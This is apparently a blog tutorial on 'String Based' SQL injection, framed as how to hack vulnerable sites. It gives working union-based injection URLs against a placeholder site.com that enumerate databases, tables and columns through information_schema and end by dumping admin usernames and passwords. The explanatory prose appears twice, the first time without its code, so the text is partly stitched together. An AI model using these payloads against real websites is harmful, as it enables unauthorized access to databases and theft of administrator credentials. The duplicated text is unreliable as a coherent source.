What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:
Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Results show error, so we'll assume as 10 columns, since it'll be an example for our process
2. Obtaining the Databases
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step
3.Obtaining the Tables from the current Database
Results will display the current table names
For this example, we'll be using the table name: "admin"
4.Obtaining Column names from a specific table (which in this example is "admin")
Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php
For this example, we'll use "username" and "password" as our column names
5.Obtaining Data from Column names
Results will display the data given by the columns you have chosen
This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:
Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)
Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+
Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234'
UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from
information_schema.schemata--+
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step
3.Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234'
UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from
information_schema.tables where table_schema=database()--+
For this example, we'll be using the table name: "admin"
4.Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234'
UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from
information_schema.columns where table_name=0x61646d696e--+
Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php
For this example, we'll use "username" and "password" as our column names
5.Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
Results will display the data given by the columns you have chosen
This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
0 comments:
Post a Comment